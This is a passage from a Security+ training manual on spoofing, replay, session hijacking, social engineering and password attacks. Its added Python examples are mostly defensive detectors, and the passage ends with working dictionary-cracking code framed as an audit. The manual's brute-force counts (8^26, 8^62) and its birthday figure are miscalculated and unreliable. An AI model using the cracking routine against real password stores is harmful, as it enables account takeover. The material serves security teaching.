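    """Collects the href of every <a> tag on the page."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def embedded_url(href: str) -> Optional[str]:
    """Return the complete URL hidden inside a link's path, or None.

    http://www.attacker.net/http://newspaper.com  ->  http://newspaper.com
    """
    parts = urlsplit(href)
    inner = parts.path.lstrip("/")
    if "://" not in inner:
        return None
    return inner + ("?" + parts.query if parts.query else "")


def find_rewritten_links(html: str, expected_host: str) -> List[Tuple[str, str]]:
    """Return (link, original URL) pairs for links that go through another host."""
    collector = LinkCollector()
    collector.feed(html)
    found = []
    for href in collector.links:
        inner = embedded_url(href)
        host = urlsplit(href).netloc.lower()
        # Relative links and links that stay on the expected host are left alone.
        if inner is not None and host and host != expected_host.lower():
            found.append((href, inner))
    return found


# Constructed page: two honest links followed by two rewritten ones.
SAMPLE_PAGE = """
<html><body>
<a href="/local/news">Local news</a>
<a href="http://newspaper.com/sports">Sports</a>
<a href="http://www.attacker.net/http://newspaper.com">Front page</a>
<a href="http://www.attacker.net/http://newspaper.com/login?next=home">Log in</a>
</body></html>
"""

if __name__ == "__main__":
    for link, original in find_rewritten_links(SAMPLE_PAGE, "newspaper.com"):
        print(f"rewritten: {link}\n  really points at: {original}")
```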


                      Denial of Service attacks
                       Another form of Web spoofing displays a false, but convincing Web page to the victim
                       with the objective of obtaining confidential information or providing false information.
                       The Web page mimics a legitimate Web page, but the content is altered to redirect
                       communications from the intended site to the attacker’s server.
                       To see some examples of Web spoofing, visit the following page:
                           http://www.cs.dartmouth.edu/~pkilab/demos/spoofing/
                       (Instructor note: Demonstrate the Web spoofing examples.)

                      Countermeasures
                      To defend against Web spoofing attacks, do the following:
                           • Disable JavaScript, ActiveX, and Java in the browser, so that the attacker is
                             unable to hide the evidence of the attack.
                          • Display the browser’s location line.
                          • Instruct users to watch their browser’s location line for any dubious URLs.
                          • Instruct users to set their homepage to a known secure Web site.

                      DNS spoofing
                      DNS spoofing manipulates the DNS server to redirect users to an attacker’s server. The
                      DNS server resolves Internet domain names (www.security.net) to IP addresses
                      (192.168.1.20), taking the burden off the user to remember a series of numbers. DNS
                      spoofing can alter the cache so that www.security.net, which normally translates to
                      an IP address of 203.123.12.10, is redirected to 186.120.0.40.

                             DNS spoofing is accomplished in one of three ways:
                                 • The attacker compromises the victim organization’s Web server and changes a
                                   hostname-to-IP address mapping. When users request the hostname, they are
                                   directed to the hacker’s server, rather than the authentic one.
                                  • Using IP spoofing techniques, the attacker’s DNS server answers lookup
                                    requests from users instead of the legitimate DNS server. Again, the hacker
                                    can direct user lookups to the server of his or her choice instead of to the
                                    authentic server (also called DNS hijacking).
                                 • When the victim organization’s DNS server requests lookups from authoritative
                                   servers, the attacker “poisons” the DNS server’s cache of hostname-to-IP
                                   address mappings by sending false replies. The organization’s DNS server stores
                                   the invalid hostname-to-IP address mapping and serves it to clients when they
                                   request a resolution.
                             All three attacks can cause serious security problems, such as redirecting clients to
                             wrong Internet sites or routing e-mail to non-authorized mail servers.

                             Countermeasures
                             To prevent DNS spoofing:
                                 • Ensure that your DNS software is the latest version, with the most recent
                                   security patches installed.
                                 • Enable auditing on all DNS servers.
                                 • Secure the DNS cache against pollution.
                                 • Deploy anti-IP address spoofing measures.

Do it!   C-2:   Securing the DNS cache against pollution
          Here’s how / Here’s why

          (Instructor note: Tell students the default configuration of Microsoft DNS server allows data
          from malicious or incorrectly configured servers to be cached in the DNS server. This procedure
          sets filters in place to protect the cache from DNS spoofing.)

          1 Click Start
            Choose Administrative Tools, DNS
            To open the dnsmgmt window.

          2 Right-click the server name
            In the left window pane.
            Choose Properties

          3 Activate the Advanced tab

          4 Verify that Secure cache against pollution is checked
            To filter for bogus cache instructions from unauthorized servers.

          5 Click Cancel

          6 Close the dnsmgmt window
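An added example, not from the manual or from Microsoft's DNS server, of the check behind "Secure cache against pollution": a resolver that refuses to cache records in a reply whose names lie outside the zone of the server that answered. The response below is constructed; the 203.123.12.10 and 186.120.0.40 addresses reuse the manual's DNS spoofing example, and www.example.com is a constructed out-of-zone name.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Record:
    name: str     # owner name, e.g. "www.security.net"
    rtype: str    # "A", "NS", ...
    value: str


@dataclass
class Response:
    qname: str                 # the name the resolver asked for
    server_zone: str           # zone the queried server is authoritative for
    answers: List[Record] = field(default_factory=list)
    additional: List[Record] = field(default_factory=list)


def in_bailiwick(name: str, zone: str) -> bool:
    """True if name is the zone itself or lies beneath it."""
    n = name.rstrip(".").lower()
    z = zone.rstrip(".").lower()
    return n == z or n.endswith("." + z)


def cache_response(cache: Dict[Tuple[str, str], str], resp: Response,
                   secure: bool) -> List[Record]:
    """Store the response's records in cache.

    With secure=True, records for names outside the zone of the server that
    answered are discarded and returned, so a server for security.net cannot
    plant an address for some other site. With secure=False every record is
    trusted, which is the cache pollution the text warns about.
    """
    discarded: List[Record] = []
    for rec in resp.answers + resp.additional:
        if secure and not in_bailiwick(rec.name, resp.server_zone):
            discarded.append(rec)
            continue
        cache[(rec.name.rstrip(".").lower(), rec.rtype)] = rec.value
    return discarded


# Constructed reply: the security.net name server answers the lookup for
# www.security.net correctly but appends an unrelated A record in the
# additional section that points at the attacker's 186.120.0.40.
POISONED_RESPONSE = Response(
    qname="www.security.net",
    server_zone="security.net",
    answers=[Record("www.security.net", "A", "203.123.12.10")],
    additional=[Record("www.example.com", "A", "186.120.0.40")],  # out of zone
)


def resolve_after(secure: bool) -> Tuple[Dict[Tuple[str, str], str], List[Record]]:
    """Feed the constructed reply to an empty cache and return (cache, discarded)."""
    cache: Dict[Tuple[str, str], str] = {}
    discarded = cache_response(cache, POISONED_RESPONSE, secure)
    return cache, discarded


if __name__ == "__main__":
    for secure in (False, True):
        cache, discarded = resolve_after(secure)
        print(f"secure={secure}: cached={cache} discarded={[r.name for r in discarded]}")
```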

Do it!              C-3:      Review of spoof attacks
                      Questions and answers
                       1 What method is used on LANs to map a host’s IP address with its physical
                         address?
                          A    ARP
                          B    MAC
                          C    DNS
                          D    SYN

                       2 IP address attacks spoof the __________________________ of the trusted host to
                         send its packets to the victim.

                          source IP address

                       3 Web spoofing is considered a ___________ attack when the attacker places
                         himself between the victim and the Web server that the victim wants to visit.
                          A    Denial of service
                          B    SYN
                          C    Man-in-the-middle
                          D    DDoS

                       4 IP address spoofing attacks flood the trusted host with
                         ______________________.

                          SYN packets

                       5 When can DNS spoofing be implemented? (Choose all that apply.)
                          A    The attacker compromises the victim’s DNS server and changes a hostname-
                               to-IP address mapping
                          B    The attacker rewrites the URLs embedded in legitimate Web pages to include
                               the attacker’s Web server
                          C    The attacker’s DNS server instead of a legitimate DNS server answers lookup
                               requests from users
                          D    The attacker rewrites the content of a Web page to make the victim believe
                               some false information


Topic D: Replays
              This topic covers the following CompTIA Security+ exam objectives:

               #     Objective

               1.3   Identify non-essential services and protocols and know what actions to take to reduce the risks of
                     those services and protocols

               1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                     vulnerability and risk
                      • Replay




              Replay attacks
Explanation   Replay attacks involve listening to and repeating messages from a legitimate user in
              order to impersonate the user and gain access to systems. To implement a replay attack,
              the attacker:
                  1 Uses a sniffer program or device to read and capture packets passed between two
                      hosts on the network. Sniffers work by placing the machine’s network interface
                      into “promiscuous mode,” meaning that it listens to all packet activity on the
                      network.
                  2 Filters the data and extracts the authentication transaction, typically an encrypted
                      username and password, digital signature or encryption key.
                  3 Does not attempt to decrypt the transaction, but instead replays the transaction in
                      order to gain access to a secured resource.
              Actually, replay attacks are more challenging than just recording and replaying
              information. To perform such an attack, the attacker must accurately guess the TCP
              sequence numbers. The attacker can accomplish this by using a script or utility that
              automatically makes guesses until the correct sequence is determined.

              Web-based replays
              A Web application is vulnerable to a replay attack if a user’s authentication tokens
              (nonencrypted session identifier in URL, unsecured cookie, and so on) are captured or
              intercepted by an attacker. By simply sniffing an HTTP request of an active session or
              capturing a desktop user’s cookie files, a replay attack can be very easily performed.
              For example, by sniffing a URL that contains the session ID string, an attacker might be
              able to obtain or create service to that user’s account simply by pasting this URL back
              into his Web browser. The legitimate user might not need to be logged on to the
              application at the time of the replay attack.

              Other replays
              Biometric devices are also vulnerable to replay attacks. In May of 2002, a Japanese
              researcher presented a study showing that biometric fingerprint readers can be fooled 80
              percent of the time by a fake finger created with gelatin using fingerprints lifted from a
              drinking glass.

                    Countermeasures
                    Secure authentication systems have an anti-replay feature that makes each packet
                    unique. This ensures that even if authentication data is captured by an attacker, it cannot
                    be retransmitted in order to gain access to systems. Web applications continue to be
                    vulnerable to replay attacks. This is because assailants can gain access to user
                    credentials via session IDs that are part of URLs stored in proxy server logs.
                    To prevent this type of attack:
                        • Update software with the latest security patches
                        • For Web-based transactions, use SSL to encrypt sensitive data
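An added example, not from the manual, of the anti-replay feature described above: each packet carries a sequence number that the receiver tracks with a sliding window, the way IPsec does, plus an HMAC so that a captured packet cannot be edited or renumbered and sent again. The shared key, the packet layout and the messages are constructed.

```python
import hashlib
import hmac
import struct

MAC_LEN = 32  # HMAC-SHA256 tag appended to every packet


def build_packet(key: bytes, seq: int, payload: bytes) -> bytes:
    """Sender side: prefix a never-reused sequence number and authenticate seq+payload."""
    body = struct.pack("!I", seq) + payload
    return body + hmac.new(key, body, hashlib.sha256).digest()


class AntiReplayWindow:
    """Receiver side: accept each sequence number at most once within a sliding window."""

    def __init__(self, key: bytes, window: int = 64) -> None:
        self.key = key
        self.window = window
        self.highest = 0      # highest sequence number accepted so far
        self.bitmap = 0       # bit i set  <=>  highest - i has already been accepted

    def verify(self, packet: bytes) -> str:
        if len(packet) < 4 + MAC_LEN:
            return "reject: truncated"
        body, mac = packet[:-MAC_LEN], packet[-MAC_LEN:]
        # Check integrity first: a forged or edited packet must not touch the window.
        expected = hmac.new(self.key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(mac, expected):
            return "reject: bad mac"
        seq = struct.unpack("!I", body[:4])[0]
        if seq == 0:
            return "reject: seq 0 unused"
        if seq > self.highest:
            # New high-water mark: slide the window forward and mark this seq.
            shift = seq - self.highest
            if shift >= self.window:
                self.bitmap = 1
            else:
                self.bitmap = ((self.bitmap << shift) | 1) & ((1 << self.window) - 1)
            self.highest = seq
            return "accept"
        diff = self.highest - seq
        if diff >= self.window:
            return "reject: too old"        # fell off the window; cannot tell, so refuse
        if self.bitmap & (1 << diff):
            return "reject: replayed"       # already seen: a captured packet sent again
        self.bitmap |= 1 << diff            # late but genuine, accept once
        return "accept"


if __name__ == "__main__":
    key = b"constructed-shared-key"
    rx = AntiReplayWindow(key)
    login = build_packet(key, 1, b"login alice")
    print("first delivery:", rx.verify(login))
    print("captured and resent:", rx.verify(login))
```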

Do it!              D-1:     Discussing replays
                      Questions and answers
                       1 Describe the process to perform a replay attack.
                          1 The hacker uses a sniffer to capture packets passed between two hosts on the network.
                          2 The hacker extracts the username and password, digital signature, or encryption key.
                          3 The hacker replays the transaction to gain access to a secured resource.

                       2 A Web application is vulnerable to a replay attack if a user’s _______________
                         are captured or intercepted by an attacker.

                          authentication tokens

                       3 How can an administrator protect against replays?

                          Update software with the latest security patches and, for Web-based transactions, use SSL to
                          encrypt sensitive data.


Topic E: TCP session hijacking
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                     vulnerability and risk
                      • TCP/IP Hijacking




              How TCP session hijacking works
Explanation   To accomplish TCP session hijacking, an attacker uses techniques such as ARP cache
              poisoning to make the victim believe that they connected to a trusted host, when in fact
              the victim is communicating with the attacker. A well-known tool for this purpose is
              Hunt, a free Linux tool that can monitor traffic on an Ethernet segment. With this tool,
              an attacker can then hijack TCP sessions by poisoning the victim’s ARP cache.
              To launch a TCP hijacking, the attacker is on the same Ethernet segment as the victim.
              The attacker runs Hunt (which acts as a sniffer by placing the attacker’s NIC in
              promiscuous mode) and waits for the victim to log on to the target server with his or her
              username and password. This way, the attacker can gain someone else’s username and
              password and deceive normal authentication systems.
              When Hunt sees that the TCP connection has been established, it displays the
              connection to the attacker’s console and sniffs the victim’s keystrokes as they are
              transmitted to the target host. The attacker can take over the session by choosing the
              “arp/simple attack” option from within Hunt. In this case, Hunt sends three ARP
              packets, which cause the victim’s IP address to be bound to the attacker’s MAC address.
              Now, any packets destined for the victim’s IP address are sent to the attacker’s NIC.
              Hunt verifies the binding worked by sending a ping packet to the target host. If the
              target sends its response to the attacker’s MAC address, then the attack is effective.
              Now the attacker can type commands and use the victim’s TCP connection at will. The
              attack has the same effect as if the victim logged on to a server using telnet, and walked
              away from the terminal, thereby allowing the attacker to sit down and take control of the
              session. When the attackers are done using the TCP session, they have the option of
              terminating it or resynchronizing with the victim’s MAC address.

              Countermeasures
              Use IPSec to encrypt and secure communications.
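An added example, not from the manual or from any real tool, of detection logic for the forged ARP replies described under ARP poisoning in Topic C and for the ARP rebinding that Hunt performs in this topic: it runs over a constructed ARP trace, flags replies nobody asked for and replies that try to move an IP address already on record to another MAC, and, like a switch with MAC binding, keeps the first binding it saw. All addresses in the trace are constructed.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass
class ArpFrame:
    op: str            # "request" or "reply"
    sender_ip: str     # IP the sender claims
    sender_mac: str    # MAC the sender claims for that IP
    target_ip: str     # IP being asked about (request) or the asker's IP (reply)


class ArpWatcher:
    """Passive ARP monitor: learns bindings from replies and reports attempts to change them."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}    # ip -> first MAC seen (kept, like a MAC-binding switch)
        self.pending: Set[str] = set()     # IPs with an outstanding request
        self.alerts: List[Tuple[str, str, List[str]]] = []

    def observe(self, f: ArpFrame) -> List[str]:
        """Process one frame; return the reasons it looks like poisoning (empty if clean)."""
        reasons: List[str] = []
        if f.op == "request":
            self.pending.add(f.target_ip)
            return reasons
        # A reply nobody asked for is the forged-reply pattern from the text.
        # (Legitimate gratuitous ARP, e.g. after a DHCP lease, also trips this check.)
        if f.sender_ip in self.pending:
            self.pending.discard(f.sender_ip)
        else:
            reasons.append("unsolicited reply")
        known = self.table.get(f.sender_ip)
        if known is None:
            self.table[f.sender_ip] = f.sender_mac
        elif known != f.sender_mac:
            # Attempt to move an IP to another MAC: the binding is kept, the attempt reported.
            reasons.append(f"rebinding {f.sender_ip} from {known} to {f.sender_mac}")
        if reasons:
            self.alerts.append((f.sender_ip, f.sender_mac, reasons))
        return reasons


# Constructed trace: two normal request/reply exchanges, then three forged replies
# (the text notes Hunt sends three ARP packets) claiming the gateway's 192.168.1.1
# for a different MAC.
TRACE = [
    ArpFrame("request", "192.168.1.10", "00:11:22:33:44:10", "192.168.1.1"),
    ArpFrame("reply",   "192.168.1.1",  "00:11:22:33:44:01", "192.168.1.10"),
    ArpFrame("request", "192.168.1.10", "00:11:22:33:44:10", "192.168.1.20"),
    ArpFrame("reply",   "192.168.1.20", "00:11:22:33:44:20", "192.168.1.10"),
    ArpFrame("reply",   "192.168.1.1",  "de:ad:be:ef:00:01", "192.168.1.10"),
    ArpFrame("reply",   "192.168.1.1",  "de:ad:be:ef:00:01", "192.168.1.10"),
    ArpFrame("reply",   "192.168.1.1",  "de:ad:be:ef:00:01", "192.168.1.10"),
]


def run_trace(frames: List[ArpFrame] = TRACE) -> ArpWatcher:
    """Run the watcher over a trace and return it with its alerts and table filled in."""
    w = ArpWatcher()
    for f in frames:
        w.observe(f)
    return w


if __name__ == "__main__":
    for ip, mac, reasons in run_trace().alerts:
        print(f"ALERT {ip} claimed by {mac}: {'; '.join(reasons)}")
```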

Do it!              E-1:     Reviewing attacks
                      Questions and answers
                          Match the following attacks with their definitions:

                          ARP poisoning                          DDoS
                          DNS spoofing                           DoS
                          IP address spoofing                    Man-in-the-Middle
                          Ping of Death                          Replay
                          TCP session hijacking                  MAC attack

                       1 Attacker intercepts communications between two              Man-in-the-middle
                         computers with intent of retransmitting captured data.

                       2 Attacker intercepts communications between two              Replay
                         computers and acts as relay to access confidential data.

                       3 Attacker takes over the victim’s IP address by corrupting   ARP poisoning
                         the ARP caches of directly connected machines.

                       4 Attacker consumes network bandwidth and computer            DoS
                         resources to disable system.

                       5 Attacker sends very large ICMP packets that are too large   Ping of Death
                         for receiver’s buffer when reassembled.

                       6 Attacker creates an IP address with a forged source         IP address spoofing
                         address.

                       7 Attacker intercepts a query to a DNS server and replies     DNS spoofing
                         with bogus information.

                       8 Attacker uses hundreds or thousands of hosts on Internet    DDoS
                         to flood a victim with requests or deprive it of its
                         resources.

                       9 Attacker hijacks TCP session to access network resources    TCP session hijacking
                         using identity of trusted host.


Topic F: Social engineering
              This topic covers the following CompTIA Security+ exam objectives:

               #     Objective

               1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                     vulnerability and risk
                      • Social Engineering

               5.1   Understand the application of the following concepts of physical security
                      • Social Engineering




              Real world threats
Explanation   Social engineering is the equivalent of hacking vulnerabilities in computer systems to
              gain access—except it occurs in the world of people. Social engineering exploits trust in
              the real world between people to gain information that attackers can then use to gain
              access to computer systems. These trust exploits usually, though not always, involve a
              verbal trick or a believable lie.
              Goals of social engineering techniques include fraud, network intrusion, industrial
              espionage, identity theft, or a desire to disrupt a system or network.
              Targets for social engineering techniques tend to be larger organizations where it is
              common for employees who have never actually met to have communications and those
              that have information desired by attackers: industrial/military secrets, personal
              information about targeted individuals, and resources such as long-distance or network
              access.
              Social engineering techniques are often used when the attacker cannot find a way to
              penetrate the victim’s systems using other means. For example, when a strong perimeter
              security and encryption foil an attacker’s efforts to penetrate the network, social
              engineering might be the only avenue left. A slip of words is all the attacker needs to
              gain access to your well-defended systems.

                  Dumpster diving
                  Digging useful information out of an organization’s trash bin is another form of attack,
                  one that makes use of the implicit trust that people have that once something is in the
                  trash, it’s gone forever. Experience shows that this is a very bad assumption, as
                  dumpster diving is an incredible source of information for those who need to penetrate
                  an organization in order to learn its secrets. The following table lists the useful
                  information that can be obtained from trash bins:

                   Item                          Description

                   Internal phone directories    Provide names and numbers of people to target and impersonate—many
                                                 usernames are based on legal names.

                   Organizational charts         Provide information about people who are in positions of authority within
                                                 the organization.

                   Policy manuals                Indicate how secure (or insecure) the company really is.

                   Calendars                     Identify which employees are out of town at a particular time.

                   Outdated hardware             Provide all sorts of useful information; for example, hard drives might be
                                                 restored.

                   System manuals, network       Include the exact information that attackers might seek, including the IP
                   diagrams, and other sources   addresses of key assets, network topologies, locations of firewalls and
                   of technical information      intrusion detection systems, operating systems, applications in use, and
                                                 more.




                  Online attacks
                  Online attacks use chat and e-mail venues to exploit trust relationships. Similar to the
                  Trojan attacks, attackers might try to induce their victims to execute a piece of code by
                  convincing them that they need it (“You have an IRC virus, and you have to run this
                  program to remove it—otherwise you’ll be banned from this group”) or that it’s
                  interesting (a game, for example). Most users are more aware of hackers when they are
                  online, and are careful about divulging information in chat sessions and e-mail. If a
                  hacker can manage to get a small program installed on a user’s machine, he might be
                  able to trick the user into reentering a username and password into a pop-up window.

                  Social engineering countermeasures
                  There are a number of steps that organizations can take to protect themselves against
                  social-engineering attacks. At the heart of all of these countermeasures is a solid
                  organizational policy that dictates expected behaviors and communicates security needs
                  to every person in the company.
                      1 Take proper care of trash and other discarded items.
                          • For all types of sensitive information on paper, use a paper shredder or
                            locked recycle box instead of a trash can.
                          • Ensure that all magnetic media is bulk erased before it is discarded.
                          • Keep trash dumpsters in secured areas so that no one has access to their
                            contents.

            2 Ensure that all system users have periodic training about network security.
                 • Make employees aware of social engineering scams and how they work.
                 • Inform users about your organization’s password policy (for example, never
                   give your password out to anybody at all, by any means at all).
                 • Give recognition to people who have avoided making mistakes or caught real
                   mistakes in a situation that might have been a social-engineering attack.
                 • Ensure people know what to do in the event they spot a social-engineering
                   attack.

Do it!   F-1:     Discussing social engineering
          Questions and answers
          1 Which of the following are the best ways to protect your organization from
            revealing sensitive information to dumpster divers?
             A     Use a paper shredder or locked recycle box
             B     Teach employees to construct strong passwords
             C     Add a firewall
             D     Keep trash dumpsters in secured areas

          2 How can you secure system users from social attacks?

             Answers might include:
             • Make employees aware of social engineering scams and how they work
             • Inform users about your organization’s password policy
             • Give recognition to people who have avoided making mistakes or caught real mistakes in
                 a situation that might have been a social-engineering attack
             • Ensure people know what to do in the event they spot a social-engineering attack


Topic G: Attacks against encrypted data
                     This topic covers the following CompTIA Security+ exam objective:

                      #       Objective

                      1.4     Understand the concept and significance of auditing, logging and system scanning
                                • Weak Keys
                                • Mathematical
                                • Birthday
                                • Password Guessing
                                   • Brute Force
                                   • Dictionary




                     Encryption
Explanation          Encryption is a method used to encode a plaintext file so only the intended recipient
                     might read the original contents. This is usually accomplished using a complex
                     algorithm and a key; the two are used to encode the original, readable version into an
                     encrypted file and then decode the encrypted file back into its original form.

                     Weak keys
                     Weak keys are secret keys used in encryption that are easily cracked. Their vulnerability
                     might be due to weak algorithms or to keys that are too simple. For example, as computer
                     processing capabilities have increased, encryption keys have grown in size and complexity
                     from 40 and 56 bits to 128 and even 256 bits.
                     Hackers will continue to try to break encryption standards. The best practice is to use
                     the strongest encryption standards and algorithms available, along with strong keys.

                     Mathematical attacks
                     A mathematical attack on a cryptographic algorithm uses the mathematical properties of
                     the algorithm to decrypt data or discover its secret keys. This is done by using
                     computations, which is a much faster method than guessing. The process of creating
                     mathematical attacks on cryptographic systems is called cryptanalysis, which is
                     traditionally broken into three categories, depending on the type of information
                     available to the analyst. The categories are listed in order of increasing advantage to the
                     analyst. Strong algorithms are expected to be able to withstand even chosen plaintext
                     attacks.
                            • Ciphertext-only analysis — The analyst has only the encrypted form of the data
                              and no information about its cleartext (pre-encrypted) content.
                            • Known plaintext attack — The analyst has available some number of messages
                              in both unencrypted and encrypted form.
                            • Chosen plaintext attack — The analyst has the ability to cause any message they
                              wish to be encrypted.

Birthday attack
A birthday attack refers to a class of brute-force mathematical attacks that exploits the
mathematical weaknesses of hash algorithms and one-way hash functions. It gets its
name from the surprising fact that the probability that two or more people in a group of
23 share the same birthday is greater than fifty percent. You would need about 183
people in the same room to get a 50-50 chance that one of them shares your birthday.
The difference is that in the first case, any two people may share any of the 365 possible
birthdays. In the second case, you’re looking for a person who matches a single
predefined birthday. This effect is called the birthday paradox. The birthday attack is one
of the most significant attacks against the integrity of digital signature schemes.
Here’s the theory behind the birthday attack: Take some function (for example, a hash
function) and supply it with a random input repeatedly. If the function returns one of k
equally likely values, then by repeatedly evaluating the function for different inputs,
statistically we expect to obtain the same output twice after about 1.2 × k^(1/2) (that is,
1.2√k) inputs. For the birthday paradox, replace k with 365: 1.2 × √365 ≈ 23.
Birthday attacks are often used to find collisions (two inputs that result in the same hash
value) of hash functions and are useful because they reveal mathematical weaknesses
that can be used to compromise the hash. This is a much, much faster approach
(compare 183 to 23 in the earlier birthday example) than the brute force technique of
trying every possible combination.
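The two searches the text contrasts (any collision among the outputs, versus a match to one predefined output), carried out on a deliberately truncated SHA-256 so that collisions are cheap to find. This is an added example, not code from the manual; the 16-bit truncation, the random 8-byte inputs and the run counts are choices made for the demonstration.

```python
import hashlib
import math
import random
from typing import Optional


def birthday_bound(k: int) -> float:
    """Expected number of random inputs before some output repeats: about 1.2 * sqrt(k)."""
    return 1.2 * math.sqrt(k)


def collision_probability(k: int, n: int) -> float:
    """Exact probability that n inputs drawn uniformly from k outputs contain a repeat."""
    p_all_distinct = 1.0
    for i in range(n):
        p_all_distinct *= (k - i) / k
    return 1.0 - p_all_distinct


def toy_hash(data: bytes, bits: int) -> int:
    """SHA-256 truncated to its top `bits` bits: a deliberately weak hash with k = 2**bits outputs."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def find_collision(bits: int, rng: Optional[random.Random] = None):
    """Hash random 8-byte inputs until two distinct inputs share an output.
    Returns (inputs_tried, input_a, input_b)."""
    rng = rng or random.Random()
    seen = {}
    tries = 0
    while True:
        msg = rng.getrandbits(64).to_bytes(8, "big")
        tries += 1
        h = toy_hash(msg, bits)
        if h in seen and seen[h] != msg:
            return tries, seen[h], msg
        seen[h] = msg


def find_preimage(target: int, bits: int, rng: Optional[random.Random] = None) -> int:
    """Hash random inputs until one matches a single predefined output. Returns inputs tried."""
    rng = rng or random.Random()
    tries = 0
    while True:
        msg = rng.getrandbits(64).to_bytes(8, "big")
        tries += 1
        if toy_hash(msg, bits) == target:
            return tries


def average_trials(bits: int, runs: int, seed: int = 1) -> dict:
    """Average both searches over several runs so they can be set against 1.2 * sqrt(k)."""
    rng = random.Random(seed)
    k = 2 ** bits
    collision_avg = sum(find_collision(bits, rng)[0] for _ in range(runs)) / runs
    preimage_avg = sum(find_preimage(rng.randrange(k), bits, rng) for _ in range(runs)) / runs
    return {"k": k, "bound": birthday_bound(k),
            "collision_avg": collision_avg, "preimage_avg": preimage_avg}


if __name__ == "__main__":
    # The manual's figures: 23 people already give better than even odds of a shared birthday.
    print(f"P(shared birthday among 23) = {collision_probability(365, 23):.3f}")
    print(f"1.2 * sqrt(365) = {birthday_bound(365):.1f}")
    # With k = 2**16 the collision search needs a few hundred hashes;
    # the single-target search needs tens of thousands.
    print(average_trials(bits=16, runs=20))
```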

Password guessing
Password guessing is another attack that seeks to circumvent normal authentication
systems by guessing the victim’s password. This can actually be a trivial operation in
some cases. For example, the Microsoft Windows operating system stores username and
password information in a SAM file located in the system directory. If attackers can
gain access to the SAM file, they can immediately determine the user accounts (logon
IDs) configured on the machine in question, and can then use brute force or dictionary
password guessing tools on it to determine the users’ passwords. This can take some
time if the user has selected a strong password, but can take substantially less time if the
user has selected a common English word that can be determined by using a dictionary
attack.
One well-known commercial tool for assessing user passwords is called L0phtCrack
after the hacker group named L0pht. (L0pht is now part of the security firm @stake.)
This tool has a number of features, including the ability to conduct the brute force and
dictionary attacks on Windows passwords outlined below.

                  Brute force
                  The brute force approach to password guessing generates every possible combination of
                  keystrokes that could be included in a password, and passes each possible combination
                  one by one through the password hash function in order to crack the victim’s password.
                  For example, a hacker attempting to crack a five-letter password of all uppercase letters
                  might try “AAAAA,” “BAAAA,” “CAAAA,” and so on until the victim’s password is
                  discovered.
                  The brute force approach is more effective than the dictionary attack because it can crack
                  any password, regardless of whether or not it is an English word that could be vulnerable to
                  the dictionary attack. A brute force attack is computationally very intensive, and can therefore
                  take some time to complete. For example, an 8-character password that uses only uppercase
                  letters would require 8^26, or 302,231,454,903,657,293,676,544, possible combinations. If the
                  password could use lowercase and numeric characters as well as uppercase ones, then the
                  number of possible combinations jumps up to 8^(26+26+10), or 8^62, combinations, which is a
                  much higher number and would therefore take much longer to run through all possible
                  combinations. Of course, the attackers could get lucky. If they stumble across the victim’s
                  password early on, the time required to crack the password could be dramatically shorter, as
                  would be the case if the victim’s password is “BAAAA.”

                  Dictionary
                  The dictionary approach to password cracking uses a predetermined list of words,
                  typically normal English words and some variations, as input to the password hash. A
                  dictionary password-cracking tool resolves the hash for each word in its list and then
                  compares the hash against the user’s password hash, one by one. When the two match,
                  then the password has been cracked.
                  The dictionary attack only works against poorly chosen passwords. For this reason, it’s
                  important that organizations put in place a policy that dictates users choose strong
                  passwords that are not susceptible to this type of attack. Strong passwords are generally
                  at least eight characters and use a mixture of uppercase, lowercase, numeric, and special
                  characters.
                  It is unlikely that an attacker’s word list includes this type of password, although poorly
                  chosen passwords that meet the above criteria might still be in a hacker’s word list. The
                  word “p@55w0rd” (“password,” spelled using the well-known hacker style) would be a
                  bad choice for a password because it might be included in an attacker’s word list.
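Both sides of the argument above, the dictionary attack itself (run by a defender against their own hash store, which is what a password audit is) and the policy check the text calls for, as an added example that is not code from the manual or from L0phtCrack. The word list, the substitution table, the suffix list and the four sample accounts are constructed, and SHA-256 stands in for the real Windows (LM/NTLM) password hash so the example is self-contained.

```python
import hashlib
import itertools
import string
from typing import Dict, Iterable, Iterator, List

# Constructed word list; a real audit uses tens of thousands of words.
WORDLIST = ["password", "welcome", "letmein", "summer", "dragon"]

# Letter -> characters commonly substituted for it in "hacker style" spellings.
SUBSTITUTIONS = {"a": "@4", "e": "3", "i": "1!", "o": "0", "s": "$5", "t": "7"}
# Reverse map, used to normalise a candidate back towards plain letters.
UNSUBSTITUTE = {ch: letter for letter, chars in SUBSTITUTIONS.items() for ch in chars}
SUFFIXES = ["", "1", "123", "!", "2003"]


def hash_password(password: str) -> str:
    """Stand-in for the stored hash (SHA-256 here; Windows uses LM/NTLM hashes)."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def leet_variants(word: str) -> Iterator[str]:
    """The word, then every way of replacing all occurrences of some of its letters."""
    yield word
    letters = sorted({c for c in word if c in SUBSTITUTIONS})
    for n in range(1, len(letters) + 1):
        for chosen in itertools.combinations(letters, n):
            for picks in itertools.product(*(SUBSTITUTIONS[c] for c in chosen)):
                variant = word
                for letter, repl in zip(chosen, picks):
                    variant = variant.replace(letter, repl)
                yield variant


def mangle(word: str) -> Iterator[str]:
    """Every candidate derived from one dictionary word: leet form x case form x suffix."""
    for variant in leet_variants(word.lower()):
        for form in (variant, variant.capitalize(), variant.upper()):
            for suffix in SUFFIXES:
                yield form + suffix


def audit(stored_hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """The dictionary attack run against our own hash store.
    Returns {user: recovered_password} for every stored hash hit by the word list."""
    by_hash: Dict[str, List[str]] = {}
    for user, digest in stored_hashes.items():
        by_hash.setdefault(digest, []).append(user)
    recovered: Dict[str, str] = {}
    for word in wordlist:
        for candidate in mangle(word):
            for user in by_hash.get(hash_password(candidate), []):
                recovered.setdefault(user, candidate)
    return recovered


def meets_complexity(password: str) -> bool:
    """The text's rule: eight or more characters mixing upper, lower, digit and special."""
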